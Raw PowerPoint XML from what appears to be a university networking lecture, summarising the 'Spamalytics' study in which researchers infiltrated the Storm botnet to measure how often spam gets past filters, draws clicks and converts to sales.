                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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8"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Spamalytics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: An Empirical Analysis of Spam Marketing Conversion”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2183642"/>
            <a:ext cx="10611678" cy="4521958"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methodology leveraged infiltration of the Storm botnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Measured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conversion rate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of three spam campaigns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Probability that an unsolicited email will elicit a desired action from a victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For more than 469M spam emails, authors identified:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Number that pass thru anti-spam filters </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Number that elicit visits to advertised sites (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response rate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Number of “sales” and “infections” produced (conversion rate)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18476825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Spam Conversion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Big question</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why do spammers continue to send spam?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t spam filters eliminate &gt;99% of spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More questions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How many messages get past spam filters?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How much money does each successful “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>txn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” (transaction) make?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4097508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494"/>
            <a:ext cx="10515600" cy="1046328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methodology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477253" y="1321813"/>
            <a:ext cx="11237494" cy="5344680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infiltrate Storm botnet at proxy level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rewrite spam instructions to use URLs specified by the researchers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URLs point to websites controlled by researchers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look like clones of the actual scam sites, but are “defanged”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Record activity throughout the conversion funnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How much spam is delivered? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Look at SMTP delivery error rate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How much spam is filtered? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Send spam to honeypots controlled by the researchers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the click-through rate? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Observe visits to the URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How many people convert? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Observe behavior on the clone sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modified ~470M emails generated by Storm over a period of a month</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28981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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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8" end="8"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28"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fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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Oval 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5034886" y="2031186"/>
            <a:ext cx="4511885" cy="4511885"/>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Storm Botnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{283B9EA5-CE9A-4950-A80C-5ADF06B45BB8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589449" y="4267201"/>
            <a:ext cx="2059218" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Master Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985576" y="1786801"/>
            <a:ext cx="1485920" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Botmaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2050" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2495946" y="2507265"/>
            <a:ext cx="0" cy="110679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050" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2495946" y="2507264"/>
            <a:ext cx="702882" cy="3918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2677253" y="3810026"/>
            <a:ext cx="2357633" cy="2128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449816" y="2982712"/>
            <a:ext cx="2037280" cy="779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677253" y="3731567"/>
            <a:ext cx="2504853" cy="13411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449816" y="2248466"/>
            <a:ext cx="2534290" cy="81219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050" name="Picture 2" descr="D:\Classes\CS 4700\assets\devil-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316" y="1528004"/>
            <a:ext cx="979261" cy="9792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Classes\CS 4700\assets\ser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514" y="3291036"/>
            <a:ext cx="881062" cy="8810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4179" y="1827015"/>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Classes\CS 4700\assets\ser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607" y="2620129"/>
            <a:ext cx="881062" cy="881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824" y="1827015"/>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7164" y="2282502"/>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8753" y="2086559"/>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9689" y="3049774"/>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8446" y="4022864"/>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8039" y="6025383"/>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3506" y="4920343"/>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758" y="5717059"/>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2105" y="267438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752" y="6177783"/>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7077" y="6025383"/>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458" y="558112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448" y="4764419"/>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562" y="3731567"/>
            <a:ext cx="616648" cy="616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="TextBox 2048"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8775488" y="1563887"/>
            <a:ext cx="1829496" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Structured P2P DHT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="TextBox 110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1635890" y="5193640"/>
            <a:ext cx="2936978" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get commands from the DHT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="56" name="Group 55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="1748507" y="5624672"/>
            <a:ext cx="2689836" cy="1042813"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Rectangular Callout 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181599" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -72766"/>
                <a:gd name="adj2" fmla="val -108071"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="TextBox 57"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219206" y="4928315"/>
              <a:ext cx="5181599" cy="1267182"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Researchers Infiltrated Here</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Up Arrow 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5651618" y="4729285"/>
            <a:ext cx="411748" cy="686917"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="381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Up Arrow 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17989298">
            <a:off x="5469908" y="3933286"/>
            <a:ext cx="411748" cy="686917"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="381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Up Arrow 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19635006">
            <a:off x="5667109" y="3279172"/>
            <a:ext cx="411748" cy="686917"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="381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4" name="Group 63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="6323670" y="3877531"/>
            <a:ext cx="2689836" cy="1042813"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="Rectangular Callout 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181599" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 4936"/>
                <a:gd name="adj2" fmla="val -28736"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="TextBox 65"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219206" y="4928315"/>
              <a:ext cx="5181599" cy="1267182"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Advantage: easy to infiltrate</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="67" name="Group 66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="5608568" y="160059"/>
            <a:ext cx="3526145" cy="1042813"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="Rectangular Callout 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181599" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 36116"/>
                <a:gd name="adj2" fmla="val 142460"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="TextBox 68"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219206" y="4928315"/>
              <a:ext cx="5181599" cy="1267182"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Disadvantage: not complete coverage</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258265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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
